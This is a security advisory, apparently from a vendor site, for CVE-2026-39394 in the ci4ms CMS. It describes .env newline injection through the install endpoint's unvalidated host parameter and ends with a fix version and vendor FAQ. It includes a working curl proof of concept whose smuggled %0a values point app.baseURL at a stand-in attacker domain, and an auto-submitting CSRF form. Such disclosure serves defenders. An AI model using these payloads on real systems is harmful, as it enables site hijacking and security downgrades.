Summary
The Install::index() controller reads the host POST parameter without any validation and passes it directly into updateEnvSettings(), which writes it into the .env file via preg_replace(). Because newline characters in the value are not stripped, an attacker can inject arbitrary configuration directives into the .env file. The install routes have CSRF protection explicitly disabled, and the InstallFilter can be bypassed when cache('settings') is empty (cache expiry or fresh deployment).
Details
In modules/Install/Controllers/Install.php, the $valData array (lines 13-27) defines validation rules for all POST parameters except host. The host value is read at line 35:
// line 32-41
$updates = [
'CI_ENVIRONMENT' => 'development',
'app.baseURL' => '\'' . $this->request->getPost('baseUrl') . '\'',
'database.default.hostname' => $this->request->getPost('host'), // NO VALIDATION
'database.default.database' => $this->request->getPost('dbname'),
// ...
];
This value is passed to updateEnvSettings() (lines 89-101), which uses preg_replace with the raw value as the replacement string:
// line 94-98
foreach ($updates as $key => $value) {
$pattern = '/^' . preg_quote($key, '/') . '=.*/m';
$replacement = "{$key}={$value}";
if (preg_match($pattern, $contents)) $contents = preg_replace($pattern, $replacement, $contents);
else $contents .= PHP_EOL . $replacement;
}
Since the env template has all lines commented out (e.g., # database.default.hostname = localhost), the pattern does not match, and the value is appended verbatim, including any embedded newline characters. This allows injection of arbitrary key=value pairs into .env.
The dbpassword field (line 17) is a secondary vector, its validation (permit_empty|max_length[255]) does not reject newline characters.
Access conditions:
- CSRF is explicitly disabled for install routes (
InstallConfig.php:7-9), confirmed consumed byFilters.php:220-231,246-251. InstallFilter(line 13) only blocks when both.envexists andcache('settings')is populated. The endpoint is accessible during fresh install or after cache expiry/clear.
Mitigation note: encryption.key injection is NOT exploitable because generateEncryptionKey() (line 70) runs after updateEnvSettings() and overwrites all encryption.key= lines with a cryptographically random value. However, all other .env settings remain injectable.
PoC
Scenario: Application is deployed but cache has expired (or fresh install window).
# Inject app.baseURL override and disable secure requests via host parameter
# The %0a represents a newline that creates new .env lines
curl -X POST 'http://target/install/' \
-d 'baseUrl=http://target/&dbname=ci4ms&dbusername=root&dbpassword=&dbdriver=MySQLi&dbpre=ci4ms_&dbport=3306&name=Admin&surname=User&username=admin&password=Password123&[email protected]&siteName=TestSite&host=localhost%0aapp.baseURL=http://evil.example.com/%0aapp.forceGlobalSecureRequests=false%0asession.driver=CodeIgniter\Session\Handlers\DatabaseHandler'
Expected result: The .env file will contain:
database.default.hostname=localhost
app.baseURL=http://evil.example.com/
app.forceGlobalSecureRequests=false
session.driver=CodeIgniter\Session\Handlers\DatabaseHandler
These injected lines override the legitimate app.baseURL set earlier (CI4's DotEnv processes top-to-bottom; later values win for putenv), redirect the application base URL to an attacker-controlled domain, and modify session handling.
CSRF exploitation variant (no direct access needed):
<!-- Hosted on attacker site, victim admin visits while cache is empty -->
<form id="f" method="POST" action="http://target/install/">
<input name="baseUrl" value="http://target/">
<input name="host" value="localhost app.baseURL='http://evil.example.com/'">
<!-- ... other required fields ... -->
</form>
<script>document.getElementById('f').submit();</script>
Impact
An unauthenticated attacker can inject arbitrary configuration into the .env file when the install endpoint is accessible (fresh deployment or cache expiry). This enables:
- Application URL hijacking, injecting
app.baseURLto an attacker domain, causing password reset links, redirects, and asset loading to point to attacker infrastructure - Security downgrade, disabling
forceGlobalSecureRequests, CSP, or other security settings - Session manipulation, changing session driver or save path configuration
- Full application reconfiguration, the
copyEnvFile()method overwrites the existing.envwith the template before applying updates, destroying the current configuration (denial of service) - Database redirect, while not via the
hostinjection itself (the host value is a legitimate DB config), injecting additional database config lines can alter connection behavior
The attack is amplified by the absence of CSRF protection on the install endpoint, allowing exploitation via a malicious webpage visited by anyone on the same network.
CVE-2026-39394 has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.31.4.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-39394? CVE-2026-39394 is a high-severity security vulnerability in ci4-cms-erp/ci4ms (composer), affecting versions <= 0.31.3.0. It is fixed in 0.31.4.0.
- How severe is CVE-2026-39394? CVE-2026-39394 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of ci4-cms-erp/ci4ms are affected by CVE-2026-39394? ci4-cms-erp/ci4ms (composer) versions <= 0.31.3.0 is affected.
- Is there a fix for CVE-2026-39394? Yes. CVE-2026-39394 is fixed in 0.31.4.0. Upgrade to this version or later.
- Is CVE-2026-39394 exploitable, and should I be worried? Whether CVE-2026-39394 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-39394 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-39394? Upgrade
ci4-cms-erp/ci4msto 0.31.4.0 or later.